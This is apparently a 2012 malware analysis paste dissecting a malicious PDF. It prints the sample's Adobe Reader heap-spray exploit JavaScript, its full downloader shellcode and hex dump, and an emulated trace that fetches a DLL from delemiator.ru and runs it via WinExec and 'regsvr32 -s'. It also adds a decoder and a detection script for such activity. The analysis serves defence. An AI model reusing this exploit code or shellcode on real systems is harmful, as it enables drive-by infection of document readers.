else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
{
  function a()
  {
    util.printd('p@111111111111111111111111 : yyyy111', new Date())
  }
  var h = app.plugIns;
  for (var f = 0; f < h.length; f++)
  {
    if (h[f].name == 'EScript')
    {
      var i = h[f].version
    }
  }
  if ((i > 8.12) && (i < 8.2))
  {
    c = new Array();
    var d = unescape('%u9090%u9090');
    var e = unescape(bjsg);
    while (d.length <= 0x8000)
    {
      d += d
    }
    d = d.substr(0, 0x8000 - e.length);
    for (f = 0; f < 2900; f++)
    {
      c[f] = d + e
    }
    a();
    a();
    try
    {
      this.media.newPlayer(null)
    }
    catch (e)
    {
    }
    a()
  }
}


=======================================

SHELLCODE EXECUTION POST EXPLOITATION

======================================


// After any of the four exploits succeeds,
// execution lands in the heap-sprayed shellcode bjsg:

bjsg = '%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u642f%u6c65%u6d65%u6169%u6f74%u2e72%u7572%u383a%u3830%u2f30%u6f66%u7572%u2f6d%u696c%u6b6e%u2f73%u6f63%u756c%u6e6d%u702e%u7068%u633f%u6d79%u7577%u333d%u3a30%u6e3%u313a%u3a69%u6931%u333a%u2633%u6974%u706b%u7969%u666b%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31%u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u6f6b%u3d75%u6831%u6826%u6579%u6f64%u3d61%u7066%u6d74%u266c%u6968%u6463%u3d6b%u6d68%u6e79%u616b%u776a%u0000';


// If we unescape it (each %uXXXX is one UTF-16 unit, stored little-endian,
// so %u8366 becomes the bytes 66 83), it yields the binary below:


66 83 e4 fc fc 85 e4 75  34 e9 5f 33 c0 64 8b 40   f......u4._3.d.@
30 8b 40 0c 8b 70 1c 56  8b 76 08 33 db 66 8b 5e   0.@..p.V.v.3.f.^
3c 03 74 33 2c 81 ee 15  10 ff ff b8 8b 40 30 c3   <.t3,........@0.
46 39 06 75 fb 87 34 24  85 e4 75 51 e9 eb 4c 51   F9.u..4$..uQ..LQ
56 8b 75 3c 8b 74 35 78  03 f5 56 8b 76 20 03 f5   V.u<.t5x..V.v...
33 c9 49 41 fc ad 03 c5  33 db 0f be 10 38 f2 74   3.IA....3....8.t
08 c1 cb 0d 03 da 40 eb  f1 3b 1f 75 e6 5e 8b 5e   ......@..;.u.^.^
24 03 dd 66 8b 0c 4b 8d  46 ec ff 54 24 0c 8b d8   $..f..K.F..T$...
03 dd 8b 04 8b 03 c5 ab  5e 59 c3 eb 53 ad 8b 68   ........^Y..S..h
20 80 7d 0c 33 74 03 96  eb f3 8b 68 08 8b f7 6a   ..}.3t.....h...j
05 59 e8 98 ff ff ff e2  f9 e8 00 00 00 00 58 50   .Y............XP
6a 40 68 ff 00 00 00 50  83 c0 19 50 55 8b ec 8b   j@h....P...PU...
5e 10 83 c3 05 ff e3 68  6f 6e 00 00 68 75 72 6c   ^......hon..hurl
6d 54 ff 16 83 c4 08 8b  e8 e8 61 ff ff ff eb 02   mT........a.....
eb 72 81 ec 04 01 00 00  8d 5c 24 0c c7 04 24 72   .r.......\$...$r
65 67 73 c7 44 24 04 76  72 33 32 c7 44 24 08 20   egs.D$.vr32.D$..
2d 73 20 53 68 f8 00 00  00 ff 56 0c 8b e8 33 c9   -s.Sh.....V...3.
51 c7 44 1d 00 77 70 62  74 c7 44 1d 05 2e 64 6c   Q.D..wpbt.D...dl
6c c6 44 1d 09 00 59 8a  c1 04 30 88 44 1d 04 41   l.D...Y...0.D..A
51 6a 00 6a 00 53 57 6a  00 ff 56 14 85 c0 75 16   Qj.j.SWj..V...u.
6a 00 53 ff 56 04 6a 00  83 eb 0c 53 ff 56 04 83   j.S.V.j....S.V..
c3 0c eb 02 eb 13 47 80  3f 00 75 fa 47 80 3f 00   ......G.?.u.G.?.
75 c4 6a 00 6a fe ff 56  08 e8 9c fe ff ff 8e 4e   u.j.j..V.......N
0e ec 98 fe 8a 0e 89 6f  01 bd 33 ca 8a 5b 1b c6   .......o..3..[..
46 79 36 1a 2f 70 68 74  74 70 3a 2f 2f 64 65 6c   Fy6./phttp://del
65 6d 69 61 74 6f 72 2e  72 75 3a 38 30 38 30 2f   emiator.ru:8080/
66 6f 72 75 6d 2f 6c 69  6e 6b 73 2f 63 6f 6c 75   forum/links/colu
6d 6e 2e 70 68 70 3f 63  79 6d 77 75 3d 33 30 3a   mn.php?cymwu=30:
31 6e 3a 31 69 3a 31 69  3a 33 33 26 74 69 6b 70   1n:1i:1i:33&tikp
69 79 6b 66 3d 32 76 3a  31 6b 3a 31 6d 3a 33 32   iykf=2v:1k:1m:32
3a 33 33 3a 31 6b 3a 31  6b 3a 33 31 3a 31 6a 3a   :33:1k:1k:31:1j:
31 6f 26 7a 6b 6f 75 3d  31 68 26 68 79 65 64 6f   1o&zkou=1h&hyedo
61 3d 66 70 74 6d 6c 26  68 69 63 64 6b 3d 68 6d   a=fptml&hicdk=hm
79 6e 6b 61 6a 77 00 00                            ynkajw..

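An added decoder (not part of the original paste or its tooling) that reproduces the unescape step with JavaScript's exact rules, dumps the result in the same layout as the listing above, and pulls the download URL out of the bytes. The input it runs on is constructed: the first eight %u units of the page's bjsg string followed by a made-up URL (c2.example.invalid), not the real shellcode; feed it the full bjsg string to reproduce the page's dump. It also shows what a "hexed" copy does to the decoding: a three-digit escape such as %u6e3 is not decoded by unescape() but kept as literal characters, which shifts every byte after it.

```python
import re

# The script stores its shellcode as a JavaScript %uXXXX string.  unescape()
# turns every %uXXXX into one UTF-16 code unit, and Reader keeps the string
# in memory little-endian, so %u8366 is the two bytes 66 83.
_ESC = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')


def js_unescape(s: str) -> str:
    """Same decoding rules as JavaScript unescape(): %uXXXX and %XX are
    decoded, anything malformed (e.g. a three-digit %u6e3) stays literal."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def to_memory_bytes(js_string: str) -> bytes:
    """Bytes as laid out in the reader's heap after unescape()."""
    # surrogatepass: shellcode routinely contains lone D800-DFFF code units
    return js_unescape(js_string).encode('utf-16-le', 'surrogatepass')


def js_escape(data: bytes) -> str:
    """Inverse of to_memory_bytes(); used here only to build the sample."""
    if len(data) % 2:
        data += b'\x00'
    return ''.join('%%u%02x%02x' % (data[i + 1], data[i])
                   for i in range(0, len(data), 2))


def hexdump(data: bytes, width: int = 16) -> str:
    """Offset, hex bytes and printable ASCII, one line per `width` bytes."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = ' '.join('%02x' % b for b in chunk)
        text = ''.join(chr(b) if 0x20 <= b < 0x7f else '.' for b in chunk)
        lines.append('%04x  %-*s  %s' % (off, width * 3 - 1, hexpart, text))
    return '\n'.join(lines)


def find_urls(data: bytes):
    """Downloader shellcode carries its URL as a NUL-terminated ASCII string."""
    return re.findall(rb'https?://[\x21-\x7e]+', data)


# Constructed sample: the first eight units of the page's bjsg string
# (66 83 e4 fc = "and sp, -4", the stack-alignment prologue) followed by a
# made-up URL.  The real sample's URL is only in the page's own dump.
SAMPLE_PROLOGUE = '%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b'
SAMPLE_URL = 'http://c2.example.invalid:8080/forum/links/column.php?a=1'
SAMPLE = SAMPLE_PROLOGUE + js_escape(SAMPLE_URL.encode() + b'\x00\x00')

if __name__ == '__main__':
    blob = to_memory_bytes(SAMPLE)
    print(hexdump(blob))
    print('URLs:', find_urls(blob))
    # A "hexed" copy: the 3-digit %u6e3 is kept as the literal text '%u6e3'
    # (five UTF-16 units), shifting everything after it by ten bytes.
    print(hexdump(to_memory_bytes('%u6e3%u313a')))
```

Because the decoder mirrors unescape() rather than a generic hex parser, running it on the paste's own (deliberately broken) string gives the bytes a reader would actually have in memory, which is what you want when comparing against a dump or emulating the code.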

// The Windows API calls the shellcode makes (emulated call trace) are as per below.
// It uses kernel32.dll, urlmon.dll and regsvr32.exe to carry out the infection:
// VirtualProtect to make 255 bytes of its own body writable (the 6a 40 / 68 ff 00 00 00
// pushes above), URLDownloadToFileA to fetch the payload into %TEMP%\wpbt0.dll,
// then WinExec on the file directly and again via "regsvr32 -s" (silent DLL registration).

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?cymwu=30:1n:1i:1i:33&tikpiykf=2v:1k:1m:32:33:1k:1k:31:1j:1o&zkou=1h&hyedoa=fptml&hicdk=hmynkajw, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

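A detection check over constructed process-creation events, modelled on the trace above: what a Sysmon-style log would show when Reader's shellcode hands a DLL dropped in the user's Temp directory to regsvr32 -s. This is an added example, not from the page; the log format, the timestamps, and the reader image names AcroRd32.exe / Acrobat.exe are assumptions made for it. Two rules are applied, silent regsvr32 of a DLL under a temp path, and any process spawned by the PDF reader, and a single event can trip both.

```python
import re

# Constructed sample log: one event per line, key=value, quoted where the
# value contains spaces.  Line 1 is what the API trace above would produce.
SAMPLE_LOG = r'''
ts=2012-11-26T07:35:46Z image=C:\WINDOWS\system32\regsvr32.exe cmdline="regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll" parent="C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe"
ts=2012-11-26T07:40:02Z image=C:\WINDOWS\system32\regsvr32.exe cmdline="regsvr32 /s C:\Program Files\Vendor\vendor.dll" parent=C:\WINDOWS\system32\msiexec.exe
ts=2012-11-26T07:41:10Z image="C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe" cmdline="AcroRd32.exe invoice.pdf" parent=C:\WINDOWS\explorer.exe
ts=2012-11-26T07:41:12Z image=C:\WINDOWS\system32\cmd.exe cmdline="cmd /c whoami" parent="C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe"
'''.strip().splitlines()

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
READER_IMAGES = {'acrord32.exe', 'acrobat.exe'}          # assumed image names
_TEMP_DIR = re.compile(r'\\(?:temp|tmp)\\|%temp%', re.I)  # ...\Temp\... or %TEMP%
_SILENT_FLAG = re.compile(r'(?:^|\s)[-/]s(?=\s|$)', re.I)  # "-s" or "/s" token
_DLL_ARG = re.compile(r'\.dll(?=\s|"|$)', re.I)


def parse_event(line: str) -> dict:
    """key=value / key="value with spaces" -> dict."""
    return {k: (quoted or bare) for k, quoted, bare in _KV.findall(line)}


def basename(path: str) -> str:
    return path.rsplit('\\', 1)[-1].lower()


def classify(ev: dict):
    """Return the list of rules the event trips (empty when benign)."""
    reasons = []
    image = basename(ev.get('image', ''))
    parent = basename(ev.get('parent', ''))
    cmd = ev.get('cmdline', '')
    if (image == 'regsvr32.exe' and _SILENT_FLAG.search(cmd)
            and _DLL_ARG.search(cmd) and _TEMP_DIR.search(cmd)):
        reasons.append('silent regsvr32 registration of a DLL from a temp directory')
    if parent in READER_IMAGES and image not in READER_IMAGES:
        reasons.append('%s spawned by PDF reader %s' % (image, parent))
    return reasons


def scan(lines):
    """[(line_number, reasons)] for every event that trips at least one rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = classify(parse_event(line))
        if reasons:
            hits.append((n, reasons))
    return hits


if __name__ == '__main__':
    for n, reasons in scan(SAMPLE_LOG):
        print('line %d: %s' % (n, '; '.join(reasons)))
```

The regsvr32 rule deliberately does not key on the file name wpbt0.dll: that name is one sample's choice, while "silent registration of a DLL that lives in a temp directory, started by a document viewer" is the behaviour that survives a recompile of the downloader.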
===============================
PAYLOAD URL IS HERE....
==============================

// There we go, the URL is plainly seen now:

http://delemiator.ru:8080/forum/links/column.php?cymwu=30:1n:1i:1i:33&tikpiykf=2v:1k:1m:32:33:1k:1k:31:1j:1o&zkou=1h&hyedoa=fptml&hicdk=hmynkajw


================================================

CURRENT DETECTION OF ANTIVIRUS IS ??

================================================

// It has a "not bad" VT detection score of 19 / 44
// url: https://www.virustotal.com/file/b771f74ff9c17682f15485bc11a7dd379cfea3b8b1f48b1391a5e53b7e693c2c/analysis/
//
// But you will never know for sure which exploitation was used if you
// got hit by this mess, because the AV products only report
// the "not so comprehensive" malware names below.
// None of them says which of the four exploits actually exist in this malicious PDF infector.

F-Secure                 : Exploit:W32/Kakara.A
DrWeb                    : Exploit.PDF.3099
Microsoft                : Exploit:Win32/Pdfjsc.AEW
AntiVir                  : EXP/Pidief.dmj
Norman                   : JS/Pdfka.BM
McAfee-GW-Edition        : Heuristic.BehavesLike.PDF.Exploit-CRT.I
MicroWorld-eScan         : PDF:Exploit.PDF-JS.IG
Avast                    : JS:Pdfka-gen [Expl]
nProtect                 : PDF:Exploit.PDF-JS.IG
GData                    : PDF:Exploit.PDF-JS.IG
Kaspersky                : HEUR:Exploit.Script.Generic
BitDefender              : PDF:Exploit.PDF-JS.IG
McAfee                   : Exploit-PDF!Blacole.q
ESET-NOD32               : JS/Exploit.Pdfka.PVR
Ikarus                   : Exploit.PDF
AVG                      : Script/PDF.Exploit
Sophos                   : Troj/PdfEx-HM
TrendMicro               : HEUR_PDFEXP.B
Comodo                   : Exploit.JS.Pdfka.at

// end

// .. We swore,
// .. the sweat, tears & blood of a crusader in act, is like a martyr.. one died & shall be replaced by 10 more..
// .. bless & glory to those who stick to fight for the truth 'till the end..
// .. shall we be mocked or broken in fighting, the curse is upon you, malware moronz! By the name of God.
// .. with a curse that shall last forever, a curse for those enemies of God..
// ..
// .. Yet, it is not too late to stop your evil works. Ask for forgiveness and stop your act.
// ..
---
#MalwareMustDie
@unixfreaxjp ~]$ date
Mon Nov 26 16:35:46 JST 2012